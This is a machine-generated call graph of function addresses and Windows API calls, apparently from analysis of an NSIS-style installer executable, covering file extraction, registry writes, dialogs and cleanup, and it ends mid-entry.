5076->5078 5079 4010fc 5076->5079 5078->5076 5080 401102 CreateFontIndirectA 5079->5080 5081 401167 EndPaint 5079->5081 5080->5081 5082 401112 6 API calls 5080->5082 5081->5077 5082->5081 5083 404100 lstrcpynA lstrlenA 5098 402602 5099 402892 5098->5099 5100 402609 5098->5100 5101 40260f FindClose 5100->5101 5101->5099 5102 401705 5103 4029fd 18 API calls 5102->5103 5104 40170c SearchPathA 5103->5104 5105 4027bd 5104->5105 5106 401727 5104->5106 5106->5105 5108 405cf1 lstrcpynA 5106->5108 5108->5105 5109 100029c7 5110 100029df 5109->5110 5111 10001534 2 API calls 5110->5111 5112 100029fa 5111->5112 4139 401389 4141 401390 4139->4141 4140 4013fe 4141->4140 4142 4013cb MulDiv SendMessageA 4141->4142 4142->4141 5120 40280a 5121 4029e0 18 API calls 5120->5121 5122 402810 5121->5122 5123 402663 5122->5123 5124 402841 5122->5124 5126 40281e 5122->5126 5124->5123 5125 405d13 18 API calls 5124->5125 5125->5123 5126->5123 5128 405c4f wsprintfA 5126->5128 5128->5123 5129 40218a 5130 4029fd 18 API calls 5129->5130 5131 402190 5130->5131 5132 4029fd 18 API calls 5131->5132 5133 402199 5132->5133 5134 4029fd 18 API calls 5133->5134 5135 4021a2 5134->5135 5136 405ff5 2 API calls 5135->5136 5137 4021ab 5136->5137 5138 4021bc lstrlenA lstrlenA 5137->5138 5143 4021af 5137->5143 5140 404fdc 25 API calls 5138->5140 5139 404fdc 25 API calls 5142 4021b7 5139->5142 5141 4021f8 SHFileOperationA 5140->5141 5141->5142 5141->5143 5143->5139 5143->5142 5144 40220c 5145 402226 5144->5145 5146 402213 5144->5146 5147 405d13 18 API calls 5146->5147 5148 402220 5147->5148 5149 405505 MessageBoxIndirectA 5148->5149 5149->5145 5150 401490 5151 404fdc 25 API calls 5150->5151 5152 401497 5151->5152 5153 401b11 5154 401b62 5153->5154 5158 401b1e 5153->5158 5155 401b8b GlobalAlloc 5154->5155 5159 401b66 5154->5159 5157 405d13 18 API calls 5155->5157 5156 405d13 18 API calls 5160 402220 5156->5160 5161 401ba6 5157->5161 5158->5161 5162 401b35 5158->5162 5168 402226 5159->5168 5174 405cf1 lstrcpynA 5159->5174 5166 405505 MessageBoxIndirectA 5160->5166 5161->5156 5161->5168 5172 405cf1 lstrcpynA 5162->5172 5164 401b78 GlobalFree 5164->5168 5166->5168 5167 401b44 5173 405cf1 lstrcpynA 5167->5173 5170 401b53 5175 405cf1 lstrcpynA 5170->5175 5172->5167 5173->5170 5174->5164 5175->5168 4198 401595 4199 4029fd 18 API calls 4198->4199 4200 40159c SetFileAttributesA 4199->4200 4201 4015ae 4200->4201 5176 401c95 5177 4029e0 18 API calls 5176->5177 5178 401c9c 5177->5178 5179 4029e0 18 API calls 5178->5179 5180 401ca4 GetDlgItem 5179->5180 5181 4024cb 5180->5181 4225 403217 #17 SetErrorMode OleInitialize 4226 40601c 3 API calls 4225->4226 4227 40325c SHGetFileInfoA 4226->4227 4300 405cf1 lstrcpynA 4227->4300 4229 403287 GetCommandLineA 4301 405cf1 lstrcpynA 4229->4301 4231 403299 GetModuleHandleA 4232 4032b0 4231->4232 4233 4057ac CharNextA 4232->4233 4234 4032c4 CharNextA 4233->4234 4240 4032d4 4234->4240 4235 40339e 4236 4033b1 GetTempPathA 4235->4236 4302 4031e3 4236->4302 4238 4033c9 4241 403423 DeleteFileA 4238->4241 4242 4033cd GetWindowsDirectoryA lstrcatA 4238->4242 4239 4057ac CharNextA 4239->4240 4240->4235 4240->4239 4245 4033a0 4240->4245 4310 402c79 GetTickCount GetModuleFileNameA 4241->4310 4244 4031e3 11 API calls 4242->4244 4247 4033e9 4244->4247 4395 405cf1 lstrcpynA 4245->4395 4246 403437 4254 4057ac CharNextA 4246->4254 4283 4034bd 4246->4283 4294 4034cd 4246->4294 4247->4241 4248 4033ed GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4247->4248 4250 4031e3 11 API calls 4248->4250 4252 40341b 4250->4252 4252->4241 4252->4294 4262 403452 4254->4262 4256 4034e6 4421 405505 4256->4421 4257 4035da 4259 40367d ExitProcess 4257->4259 4261 40601c 3 API calls 4257->4261 4267 4035ed 4261->4267 4263 403498 4262->4263 4264 4034fc lstrcatA lstrcmpiA 4262->4264 4396 40586f 4263->4396 4266 403518 CreateDirectoryA SetCurrentDirectoryA 4264->4266 4264->4294 4270 40353a 4266->4270 4271 40352f 4266->4271 4272 40601c 3 API calls 4267->4272 4426 405cf1 lstrcpynA 4270->4426 4425 405cf1 lstrcpynA 4271->4425 4275 4035f6 4272->4275 4277 40601c 3 API calls 4275->4277 4279 4035ff 4277->4279 4278 4034b2 4411 405cf1 lstrcpynA 4278->4411 4282 40361d 4279->4282 4286 40360d GetCurrentProcess 4279->4286 4281 405d13 18 API calls 4284 403579 DeleteFileA 4281->4284 4285 40601c 3 API calls 4282->4285 4340 403787 4283->4340 4287 403586 CopyFileA 4284->4287 4297 403548 4284->4297 4288 403654 4285->4288 4286->4282 4287->4297 4290 403669 ExitWindowsEx 4288->4290 4293 403676 4288->4293 4289 4035ce 4291 405ba5 40 API calls 4289->4291 4290->4259 4290->4293 4291->4294 4435 40140b 4293->4435 4412 403695 4294->4412 4296 405d13 18 API calls 4296->4297 4297->4281 4297->4289 4297->4296 4299 4035ba CloseHandle 4297->4299 4427 405ba5 4297->4427 4432 4054a4 CreateProcessA 4297->4432 4299->4297 4300->4229 4301->4231 4303 405f5c 5 API calls 4302->4303 4304 4031ef 4303->4304 4305 4031f9 4304->4305 4438 405781 lstrlenA CharPrevA 4304->4438 4305->4238 4308 4059b1 2 API calls 4309 403215 4308->4309 4309->4238 4441 405982 GetFileAttributesA CreateFileA 4310->4441 4312 402cbc 4339 402cc9 4312->4339 4442 405cf1 lstrcpynA 4312->4442 4314 402cdf 4443 4057c8 lstrlenA 4314->4443 4318 402cf0 GetFileSize 4319 402df1 4318->4319 4337 402d07 4318->4337 4448 402bda 4319->4448 4323 402e34 GlobalAlloc 4327 402e4b 4323->4327 4324 402e8c 4325 402bda 33 API calls 4324->4325 4325->4339 4331 4059b1 2 API calls 4327->4331 4328 402e15 4329 4031b6 ReadFile 4328->4329 4332 402e20 4329->4332 4330 402bda 33 API calls 4330->4337 4333 402e5c CreateFileA 4331->4333 4332->4323 4332->4339 4334 402e96 4333->4334 4333->4339 4463 4031cc SetFilePointer 4334->4463 4336 402ea4 4464 402f1f 4336->4464 4337->4319 4337->4324 4337->4330 4337->4339 4479 4031b6 4337->4479 4339->4246 4341 40601c 3 API calls 4340->4341 4342 40379b 4341->4342 4343 4037a1 4342->4343 4344 4037b3 4342->4344 4522 405c4f wsprintfA 4343->4522 4345 405bd8 3 API calls 4344->4345 4346 4037de 4345->4346 4348 4037fc lstrcatA 4346->4348 4350 405bd8 3 API calls 4346->4350 4349 4037b1 4348->4349 4513 403a4c 4349->4513 4350->4348 4353 40586f 18 API calls 4354 40382e 4353->4354 4355 4038b7 4354->4355 4357 405bd8 3 API calls 4354->4357 4356 40586f 18 API calls 4355->4356 4358 4038bd 4356->4358 4359 40385a 4357->4359 4360 4038cd LoadImageA 4358->4360 4361 405d13 18 API calls 4358->4361 4359->4355 4365 403876 lstrlenA 4359->4365 4368 4057ac CharNextA 4359->4368 4362 403973 4360->4362 4363 4038f4 RegisterClassA 4360->4363 4361->4360 4364 40140b 2 API calls 4362->4364 4366 40392a SystemParametersInfoA CreateWindowExA 4363->4366 4394 40397d 4363->4394 4367 403979 4364->4367 4369 403884 lstrcmpiA 4365->4369 4370 4038aa 4365->4370 4366->4362 4375 403a4c 19 API calls 4367->4375 4367->4394 4372 403874 4368->4372 4369->4370 4373 403894 GetFileAttributesA 4369->4373 4371 405781 3 API calls 4370->4371 4376 4038b0 4371->4376 4372->4365 4374 4038a0 4373->4374 4374->4370 4377 4057c8 2 API calls 4374->4377 4378 40398a 4375->4378 4523 405cf1 lstrcpynA 4376->4523 4377->4370 4380 403996 ShowWindow LoadLibraryA 4378->4380 4381 403a19 4378->4381 4383 4039b5 LoadLibraryA 4380->4383 4384 4039bc GetClassInfoA 4380->4384 4524 4050ae OleInitialize 4381->4524 4383->4384 4386 4039d0 GetClassInfoA RegisterClassA 4384->4386 4387 4039e6 DialogBoxParamA 4384->4387 4385 403a1f 4388 403a23 4385->4388 4389 403a3b 4385->4389 4386->4387 4390 40140b 2 API calls 4387->4390 4393 40140b 2 API calls 4388->4393 4388->4394 4391 40140b 2 API calls 4389->4391 4392 403a0e 4390->4392 4391->4394 4392->4394 4393->4394 4394->4294 4395->4236 4539 405cf1 lstrcpynA 4396->4539 4398 405880 4399 40581a 4 API calls 4398->4399 4400 405886 4399->4400 4401 4034a3 4400->4401 4402 405f5c 5 API calls 4400->4402 4401->4294 4410 405cf1 lstrcpynA 4401->4410 4408 405896 4402->4408 4403 4058c1 lstrlenA 4404 4058cc 4403->4404 4403->4408 4405 405781 3 API calls 4404->4405 4407 4058d1 GetFileAttributesA 4405->4407 4407->4401 4408->4401 4408->4403 4409 4057c8 2 API calls 4408->4409 4540 405ff5 FindFirstFileA 4408->4540 4409->4403 4410->4278 4411->4283 4413 4036b0 4412->4413 4414 4036a6 CloseHandle 4412->4414 4415 4036c4 4413->4415 4416 4036ba CloseHandle 4413->4416 4414->4413 4543 4036f2 4415->4543 4416->4415 4422 40551a 4421->4422 4423 4034f4 ExitProcess 4422->4423 4424 40552e MessageBoxIndirectA 4422->4424 4424->4423 4425->4270 4426->4297 4428 40601c 3 API calls 4427->4428 4429 405bac 4428->4429 4431 405bcd 4429->4431 4600 405a29 lstrcpyA 4429->4600 4431->4297 4433 4054d3 CloseHandle 4432->4433 4434 4054df 4432->4434 4433->4434 4434->4297 4436 401389 2 API calls 4435->4436 4437 401420 4436->4437 4437->4259 4439 403201 CreateDirectoryA 4438->4439 4440 40579b lstrcatA 4438->4440 4439->4308 4440->4439 4441->4312 4442->4314 4444 4057d5 4443->4444 4445 402ce5 4444->4445 4446 4057da CharPrevA 4444->4446 4447 405cf1 lstrcpynA 4445->4447 4446->4444 4446->4445 4447->4318 4449 402c00 4448->4449 4450 402be8 4448->4450 4451 402c10 GetTickCount 4449->4451 4452 402c08 4449->4452 4453 402bf1 DestroyWindow 4450->4453 4454 402bf8 4450->4454 4451->4454 4456 402c1e 4451->4456 4483 406055 4452->4483 4453->4454 4454->4323 4454->4339 4482 4031cc SetFilePointer 4454->4482 4457 402c53 CreateDialogParamA ShowWindow 4456->4457 4458 402c26 4456->4458 4457->4454 4458->4454 4487 402bbe 4458->4487 4460 402c34 wsprintfA 4461 404fdc 25 API calls 4460->4461 4462 402c51 4461->4462 4462->4454 4463->4336 4465 402f4b 4464->4465 4466 402f2f SetFilePointer 4464->4466 4490 40303a GetTickCount 4465->4490 4466->4465 4471 40303a 43 API calls 4472 402f82 4471->4472 4473 402f92 4472->4473 4474 402ffc ReadFile 4472->4474 4478 402ff6 4472->4478 4476 4059fa ReadFile 4473->4476 4477 402fc5 WriteFile 4473->4477 4473->4478 4474->4478 4476->4473 4477->4473 4477->4478 4478->4339 4480 4059fa ReadFile 4479->4480 4481 4031c9 4480->4481 4481->4337 4482->4328 4484 406072 PeekMessageA 4483->4484 4485 406082 4484->4485 4486 406068 DispatchMessageA 4484->4486 4485->4454 4486->4484 4488 402bcd 4487->4488 4489 402bcf MulDiv 4487->4489 4488->4489 4489->4460 4491 4031a4 4490->4491 4492 403069 4490->4492 4493 402bda 33 API calls 4491->4493 4505 4031cc SetFilePointer 4492->4505 4500 402f52 4493->4500 4495 403074 SetFilePointer 4499 403099 4495->4499 4496 4031b6 ReadFile 4496->4499 4498 402bda 33 API calls 4498->4499 4499->4496 4499->4498 4499->4500 4501 40312e WriteFile 4499->4501 4502 403185 SetFilePointer 4499->4502 4506 40611c 4499->4506 4500->4478 4503 4059fa ReadFile 4500->4503 4501->4499 4501->4500 4502->4491 4504 402f6b 4503->4504 4504->4471 4504->4478 4505->4495 4507 406141 4506->4507 4508 406149 4506->4508 4507->4499 4508->4507 4509 4061d0 GlobalFree 4508->4509 4510 4061d9 GlobalAlloc 4508->4510 4511 406250 GlobalAlloc 4508->4511 4512 406247 GlobalFree 4508->4512 4509->4510 4510->4507 4510->4508 4511->4507 4511->4508 4512->4511 4514 403a60 4513->4514 4531 405c4f wsprintfA 4514->4531 4516 403ad1 4517 405d13 18 API calls 4516->4517 4518 403add SetWindowTextA 4517->4518 4519 40380c 4518->4519 4520 403af9 4518->4520 4519->4353 4520->4519 4521 405d13 18 API calls 4520->4521 4521->4520 4522->4349 4523->4355 4532 404038 4524->4532 4526 4050f8 4527 404038 SendMessageA 4526->4527 4529 40510a OleUninitialize 4527->4529 4528 4050d1 4528->4526 4535 401389 4528->4535 4529->4385 4531->4516 4533 404050 4532->4533 4534 404041 SendMessageA 4532->4534 4533->4528 4534->4533 4537 401390 4535->4537 4536 4013fe 4536->4528 4537->4536 4538 4013cb MulDiv SendMessageA 4537->4538 4538->4537 4539->4398 4541 406016 4540->4541 4542 40600b FindClose 4540->4542 4541->4408 4542->4541 4544 403700 4543->4544 4545 4036c9 4544->4545 4546 403705 FreeLibrary GlobalFree 4544->4546 4547 4055b1 4545->4547 4546->4545 4546->4546 4548 40586f 18 API calls 4547->4548 4549 4055d1 4548->4549 4550 4055f0 4549->4550 4551 4055d9 DeleteFileA 4549->4551 4553 405728 4550->4553 4587 405cf1 lstrcpynA 4550->4587 4552 4034d6 OleUninitialize 4551->4552 4552->4256 4552->4257 4553->4552 4559 405ff5 2 API calls 4553->4559 4555 405616 4556 405629 4555->4556 4557 40561c lstrcatA 4555->4557 4558 4057c8 2 API calls 4556->4558 4560 40562f 4557->4560 4558->4560 4562 405742 4559->4562 4561 40563d lstrcatA 4560->4561 4563 405648 lstrlenA FindFirstFileA 4560->4563 4561->4563 4562->4552 4564 405746 4562->4564 4565 40571e 4563->4565 4578 40566c 4563->4578 4566 405781 3 API calls 4564->4566 4565->4553 4568 40574c 4566->4568 4567 4057ac CharNextA 4567->4578 4569 405569 5 API calls 4568->4569 4570 405758 4569->4570 4571 405772 4570->4571 4572 40575c 4570->4572 4573 404fdc 25 API calls 4571->4573 4572->4552 4576 404fdc 25 API calls 4572->4576 4573->4552 4574 4056fd FindNextFileA 4577 405715 FindClose 4574->4577 4574->4578 4579 405769 4576->4579 4577->4565 4578->4567 4578->4574 4582 4055b1 64 API calls 4578->4582 4584 404fdc 25 API calls 4578->4584 4585 404fdc 25 API calls 4578->4585 4586 405ba5 40 API calls 4578->4586 4588 405cf1 lstrcpynA 4578->4588 4589 405569 4578->4589 4580 405ba5 40 API calls 4579->4580 4583 405770 4580->4583 4582->4578 4583->4552 4584->4574 4585->4578 4586->4578 4587->4555 4588->4578 4597 40595d GetFileAttributesA 4589->4597 4592 405596 4592->4578 4593 405584 RemoveDirectoryA 4595 405592 4593->4595 4594 40558c DeleteFileA 4594->4595 4595->4592 4596 4055a2 SetFileAttributesA 4595->4596 4596->4592 4598 405575 4597->4598 4599 40596f SetFileAttributesA 4597->4599 4598->4592 4598->4593 4598->4594 4599->4598 4601 405a52 4600->4601 4602 405a78 GetShortPathNameA 4600->4602 4625 405982 GetFileAttributesA CreateFileA 4601->4625 4604 405a8d 4602->4604 4605 405b9f 4602->4605 4604->4605 4607 405a95 wsprintfA 4604->4607 4605->4431 4606 405a5c CloseHandle GetShortPathNameA 4606->4605 4608 405a70 4606->4608 4609 405d13 18 API calls 4607->4609 4608->4602 4608->4605 4610 405abd 4609->4610 4626 405982 GetFileAttributesA CreateFileA 4610->4626 4612 405aca 4612->4605 4613 405ad9 GetFileSize GlobalAlloc 4612->4613 4614 405b98 CloseHandle 4613->4614 4615 405afb 4613->4615 4614->4605 4616 4059fa ReadFile 4615->4616 4617 405b03 4616->4617 4617->4614 4627 4058e7 lstrlenA 4617->4627 4620 405b1a lstrcpyA 4623 405b3c 4620->4623 4621 405b2e 4622 4058e7 4 API calls 4621->4622 4622->4623 4624 405b73 SetFilePointer WriteFile GlobalFree 4623->4624 4624->4614 4625->4606 4626->4612 4628 405928 lstrlenA 4627->4628 4629 405901 lstrcmpiA 4628->4629 4630 405930 4628->4630 4629->4630 4631 40591f CharNextA 4629->4631 4630->4620 4630->4621 4631->4628 5182 406617 5186 40614f 5182->5186 5183 406aba 5184 4061d0 GlobalFree 5185 4061d9 GlobalAlloc 5184->5185 5185->5183 5185->5186 5186->5183 5186->5184 5186->5185 5186->5186 5187 406250 GlobalAlloc 5186->5187 5188 406247 GlobalFree 5186->5188 5187->5183 5187->5186 5188->5187 5189 10001058 5191 10001074 5189->5191 5190 100010dc 5191->5190 5192 100014bb GlobalFree 5191->5192 5193 10001091 5191->5193 5192->5193 5194 100014bb GlobalFree 5193->5194 5195 100010a1 5194->5195 5196 100010b1 5195->5196 5197 100010a8 GlobalSize 5195->5197 5198 100010b5 GlobalAlloc 5196->5198 5199 100010c6 5196->5199 5197->5196 5200 100014e2 3 API calls 5198->5200 5201 100010d1 GlobalFree 5199->5201 5200->5199 5201->5190 4660 402519 4661 4029e0 18 API calls 4660->4661 4665 402523 4661->4665 4662 40258d 4663 4059fa ReadFile 4663->4665 4664 40258f 4669 405c4f wsprintfA 4664->4669 4665->4662 4665->4663 4665->4664 4666 40259f 4665->4666 4666->4662 4668 4025b5 SetFilePointer 4666->4668 4668->4662 4669->4662 5202 403b19 5203 403b31 5202->5203 5204 403c6c 5202->5204 5203->5204 5205 403b3d 5203->5205 5206 403cbd 5204->5206 5207 403c7d GetDlgItem GetDlgItem 5204->5207 5209 403b48 SetWindowPos 5205->5209 5210 403b5b 5205->5210 5208 403d17 5206->5208 5216 401389 2 API calls 5206->5216 5211 403fec 19 API calls 5207->5211 5212 404038 SendMessageA 5208->5212 5217 403c67 5208->5217 5209->5210 5213 403b60 ShowWindow 5210->5213 5214 403b78 5210->5214 5215 403ca7 SetClassLongA 5211->5215 5239 403d29 5212->5239 5213->5214 5218 403b80 DestroyWindow 5214->5218 5219 403b9a 5214->5219 5220 40140b 2 API calls 5215->5220 5223 403cef 5216->5223 5269 403f75 5218->5269 5221 403bb0 5219->5221 5222 403b9f SetWindowLongA 5219->5222 5220->5206 5224 403c27 5221->5224 5225 403bbc GetDlgItem 5221->5225 5222->5217 5223->5208 5226 403cf3 SendMessageA 5223->5226 5231 404053 8 API calls 5224->5231 5229 403bec 5225->5229 5230 403bcf SendMessageA IsWindowEnabled 5225->5230 5226->5217 5227 40140b 2 API calls 5227->5239 5228 403f77 DestroyWindow EndDialog 5228->5269 5234 403bf9 5229->5234 5237 403c40 SendMessageA 5229->5237 5238 403c0c 5229->5238 5244 403bf1 5229->5244 5230->5217 5230->5229 5231->5217 5232 403fa6 ShowWindow 5232->5217 5233 405d13 18 API calls 5233->5239 5234->5237 5234->5244 5236 403fec 19 API calls 5236->5239 5237->5224 5240 403c14 5238->5240 5241 403c29 5238->5241 5239->5217 5239->5227 5239->5228 5239->5233 5239->5236 5245 403fec 19 API calls 5239->5245 5260 403eb7 DestroyWindow 5239->5260 5243 40140b 2 API calls 5240->5243 5242 40140b 2 API calls 5241->5242 5242->5244 5243->5244 5244->5224 5270 403fc5 5244->5270 5246 403da4 GetDlgItem 5245->5246 5247 403dc1 ShowWindow EnableWindow 5246->5247 5248 403db9 5246->5248 5273 40400e EnableWindow 5247->5273 5248->5247 5250 403deb EnableWindow 5253 403dff 5250->5253 5251 403e04 GetSystemMenu EnableMenuItem SendMessageA 5252 403e34 SendMessageA 5251->5252 5251->5253 5252->5253 5253->5251 5274 404021 SendMessageA 5253->5274 5275 405cf1 lstrcpynA 5253->5275 5256 403e62 lstrlenA 5257 405d13 18 API calls 5256->5257 5258 403e73 SetWindowTextA 5257->5258 5259 401389 2 API calls 5258->5259 5259->5239 5261 403ed1 CreateDialogParamA 5260->5261 5260->5269 5262 403f04 5261->5262 5261->5269 5263 403fec 19 API calls 5262->5263 5264 403f0f GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5263->5264 5265 401389 2 API calls 5264->5265 5266 403f55 5265->5266 5266->5217 5267 403f5d ShowWindow 5266->5267 5268 404038 SendMessageA 5267->5268 5268->5269 5269->5217 5269->5232 5271 403fd2 SendMessageA 5270->5271 5272 403fcc 5270->5272 5271->5224 5272->5271 5273->5250 5274->5253 5275->5256 5276 40511a 5277 4052c7 5276->5277 5278 40513c GetDlgItem GetDlgItem GetDlgItem 5276->5278 5280 4052f7 5277->5280 5281 4052cf GetDlgItem CreateThread CloseHandle 5277->5281 5321 404021 SendMessageA 5278->5321 5283 405325 5280->5283 5284 405346 5280->5284 5285 40530d ShowWindow ShowWindow 5280->5285 5281->5280 5282 4051ad 5290 4051b4 GetClientRect GetSystemMetrics SendMessageA SendMessageA 5282->5290 5287 405335 5283->5287 5288 405359 ShowWindow 5283->5288 5291 405380 5283->5291 5289 404053 8 API calls 5284->5289 5323 404021 SendMessageA 5285->5323 5292 403fc5 SendMessageA 5287->5292 5294 405379 5288->5294 5295 40536b 5288->5295 5293 405352 5289->5293 5296 405223 5290->5296 5297 405207 SendMessageA SendMessageA 5290->5297 5291->5284 5298 40538d SendMessageA 5291->5298 5292->5284 5303 403fc5 SendMessageA 5294->5303 5302 404fdc 25 API calls 5295->5302 5299 405236 5296->5299 5300 405228 SendMessageA 5296->5300 5297->5296 5298->5293 5301 4053a6 CreatePopupMenu 5298->5301 5305 403fec 19 API calls 5299->5305 5300->5299 5304 405d13 18 API calls 5301->5304 5302->5294 5303->5291 5306 4053b6 AppendMenuA 5304->5306 5307 405246 5305->5307 5308 4053d4 GetWindowRect 5306->5308 5309 4053e7 TrackPopupMenu 5306->5309 5310 405283 GetDlgItem SendMessageA 5307->5310 5311 40524f ShowWindow 5307->5311 5308->5309 5309->5293 5312 405403 5309->5312 5310->5293 5315 4052aa SendMessageA SendMessageA 5310->5315 5313 405272 5311->5313 5314 405265 ShowWindow 5311->5314 5316 405422 SendMessageA 5312->5316 5322 404021 SendMessageA 5313->5322 5314->5313 5315->5293 5316->5316 5317 40543f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5316->5317 5319 405461 SendMessageA 5317->5319 5319->5319 5320 405483 GlobalUnlock SetClipboardData CloseClipboard 5319->5320 5320->5293 5321->5282 5322->5310 5323->5283 4691 40231c 4692 402322 4691->4692 4693 4029fd 18 API calls 4692->4693 4694 402334 4693->4694 4695 4029fd 18 API calls 4694->4695 4696 40233e RegCreateKeyExA 4695->4696 4697 402368 4696->4697 4700 402663 4696->4700 4698 402380 4697->4698 4699 4029fd 18 API calls 4697->4699 4703 4029e0 18 API calls 4698->4703 4704 40238c 4698->4704 4702 402379 lstrlenA 4699->4702 4701 4023a7 RegSetValueExA 4706 4023bd RegCloseKey 4701->4706 4702->4698 4703->4704 4704->4701 4705 402f1f 46 API calls 4704->4705 4705->4701 4706->4700 5324 40261c 5325 402637 5324->5325 5326 40261f 5324->5326 5327 4027bd 5325->5327 5330 405cf1 lstrcpynA 5325->5330 5328 40262c FindNextFileA 5326->5328 5328->5325 5330->5327 5331 100010e0 5340 1000110e 5331->5340 5332 100011c4 GlobalFree 5333 100012ad 2 API calls 5333->5340 5334 100011c3 5334->5332 5335 10001266 2 API calls 5339 100011b1 GlobalFree 5335->5339 5336 10001155 GlobalAlloc 5336->5340 5337 100011ea GlobalFree 5337->5340 5338 100012d1 lstrcpyA 5338->5340 5339->5340 5340->5332 5340->5333 5340->5334 5340->5335 5340->5336 5340->5337 5340->5338 5340->5339 5341 4016a1 5342 4029fd 18 API calls 5341->5342 5343 4016a7 GetFullPathNameA 5342->5343 5344 4016be 5343->5344 5350 4016df 5343->5350 5346 405ff5 2 API calls 5344->5346 5344->5350 5345 4016f3 GetShortPathNameA 5347 402892 5345->5347 5348 4016cf 5346->5348 5348->5350 5351 405cf1 lstrcpynA 5348->5351 5350->5345 5350->5347 5351->5350 5352 10002162 5353 100021c0 5352->5353 5354 100021f6 5352->5354 5353->5354 5355 100021d2 GlobalAlloc 5353->5355 5355->5353 3924 401d26 GetDC GetDeviceCaps 3932 4029e0 3924->3932 3926 401d44 MulDiv ReleaseDC 3927 4029e0 18 API calls 3926->3927 3928 401d63 3927->3928 3929 405d13 18 API calls 3928->3929 3930 401d9c CreateFontIndirectA 3929->3930 3931 4024cb 3930->3931 3933 405d13 18 API calls 3932->3933 3934 4029f4 3933->3934 3934->3926 5356 40442a 5357 404456 5356->5357 5358 404467 5356->5358 5417 4054e9 GetDlgItemTextA 5357->5417 5360 404473 GetDlgItem 5358->5360 5365 4044d2 5358->5365 5362 404487 5360->5362 5361 404461 5364 405f5c 5 API calls 5361->5364 5368 40449b SetWindowTextA 5362->5368 5373 40581a 4 API calls 5362->5373 5363 4045b6 5366 404744 5363->5366 5419 4054e9 GetDlgItemTextA 5363->5419 5364->5358 5365->5363 5365->5366 5369 405d13 18 API calls 5365->5369 5372 404053 8 API calls 5366->5372 5371 403fec 19 API calls 5368->5371 5375 404546 SHBrowseForFolderA 5369->5375 5370 4045e6 5376 40586f 18 API calls 5370->5376 5377 4044b7 5371->5377 5378 404758 5372->5378 5374 404491 5373->5374 5374->5368 5382 405781 3 API calls 5374->5382 5375->5363 5379 40455e CoTaskMemFree 5375->5379 5380 4045ec 5376->5380 5381 403fec 19 API calls 5377->5381 5383 405781 3 API calls 5379->5383 5420 405cf1 lstrcpynA 5380->5420 5384 4044c5 5381->5384 5382->5368 5385 40456b 5383->5385 5418 404021 SendMessageA 5384->5418 5388 4045a2 SetDlgItemTextA 5385->5388 5393 405d13 18 API calls 5385->5393 5388->5363 5389 4044cb 5391 40601c 3 API calls 5389->5391 5390 404603 5392 40601c 3 API calls 5390->5392 5391->5365 5399 40460b 5392->5399 5394 40458a lstrcmpiA 5393->5394 5394->5388 5397 40459b lstrcatA 5394->5397 5395 404645 5421 405cf1 lstrcpynA 5395->5421 5397->5388 5398 40464c 5400 40581a 4 API calls 5398->5400 5399->5395 5403 4057c8 2 API calls 5399->5403 5405 404696 5399->5405 5401 404652 GetDiskFreeSpaceA 5400->5401 5404 404674 MulDiv 5401->5404 5401->5405 5403->5399 5404->5405 5406 4046f3 5405->5406 5407 4047c5 21 API calls 5405->5407 5408 404716 5406->5408 5409 40140b 2 API calls 5406->5409 5410 4046e5 5407->5410 5422 40400e EnableWindow 5408->5422 5409->5408 5412 4046f5 SetDlgItemTextA 5410->5412 5413 4046ea 5410->5413 5412->5406 5415 4047c5 21 API calls 5413->5415 5414 404732 5414->5366 5423 4043bf 5414->5423 5415->5406 5417->5361 5418->5389 5419->5370 5420->5390 5421->5398 5422->5414 5424 4043d2 SendMessageA 5423->5424 5425 4043cd 5423->5425 5424->5366 5425->5424 4143 40172c 4144 4029fd 18 API calls 4143->4144 4145 401733 4144->4145 4149 4059b1 4145->4149 4147 40173a 4148 4059b1 2 API calls 4147->4148 4148->4147 4150 4059bc GetTickCount GetTempFileNameA 4149->4150 4151 4059ed 4150->4151 4152 4059e9 4150->4152 4151->4147 4152->4150 4152->4151 4153 401dac 4154 4029e0 18 API calls 4153->4154 4155 401db2 4154->4155 4156 4029e0 18 API calls 4155->4156 4157 401dbb 4156->4157 4158 401dc2 ShowWindow 4157->4158 4159 401dcd EnableWindow 4157->4159 4160 402892 4158->4160 4159->4160 5426 401eac 5427 4029fd 18 API calls 5426->5427 5428 401eb3 5427->5428 5429 405ff5 2 API calls 5428->5429 5430 401eb9 5429->5430 5432 401ecb 5430->5432 5433 405c4f wsprintfA 5430->5433 5433->5432 5434 40192d 5435 4029fd 18 API calls 5434->5435 5436 401934 lstrlenA 5435->5436 5437 4024cb 5436->5437 5438 4024af 5439 4029fd 18 API calls 5438->5439 5440 4024b6 5439->5440 5443 405982 GetFileAttributesA CreateFileA 5440->5443 5442 4024c2 5443->5442 5451 401cb0 5452 4029e0 18 API calls 5451->5452 5453 401cc0 SetWindowLongA 5452->5453 5454 402892 5453->5454 5455 401a31 5456 4029e0 18 API calls 5455->5456 5457 401a37 5456->5457 5458 4029e0 18 API calls 5457->5458 5459 4019e1 5458->5459 5460 401e32 5461 4029fd 18 API calls 5460->5461 5462 401e38 5461->5462 5463 404fdc 25 API calls 5462->5463 5464 401e42 5463->5464 5465 4054a4 2 API calls 5464->5465 5468 401e48 5465->5468 5466 401e9e CloseHandle 5470 402663 5466->5470 5467 401e67 WaitForSingleObject 5467->5468 5469 401e75 GetExitCodeProcess 5467->5469 5468->5466 5468->5467 5468->5470 5471 406055 2 API calls 5468->5471 5472 401e90 5469->5472 5473 401e87 5469->5473 5471->5467 5472->5466 5475 405c4f wsprintfA 5473->5475 5475->5472 4173 4015b3 4174 4029fd 18 API calls 4173->4174 4175 4015ba 4174->4175 4191 40581a CharNextA CharNextA 4175->4191 4177 4015c2 4178 40160a 4177->4178 4179 4057ac CharNextA 4177->4179 4180 401638 4178->4180 4181 40160f 4178->4181 4182 4015d0 CreateDirectoryA 4179->4182 4184 401423 25 API calls 4180->4184 4183 401423 25 API calls 4181->4183 4182->4177 4185 4015e5 GetLastError 4182->4185 4186 401616 4183->4186 4190 401630 4184->4190 4185->4177 4187 4015f2 GetFileAttributesA 4185->4187 4197 405cf1 lstrcpynA 4186->4197 4187->4177 4189 401621 SetCurrentDirectoryA 4189->4190 4192 405835 4191->4192 4195 405845 4191->4195 4194 405840 CharNextA 4192->4194 4192->4195 4193 405865 4193->4177 4194->4193 4195->4193 4196 4057ac CharNextA 4195->4196 4196->4195 4197->4189 5476 4026b3 5496 405982 GetFileAttributesA CreateFileA 5476->5496 5478 4026ba 5479 402763 5478->5479 5480 4026c6 GlobalAlloc 5478->5480 5483 40276b DeleteFileA 5479->5483 5484 40277e 5479->5484 5481 40275a CloseHandle 5480->5481 5482 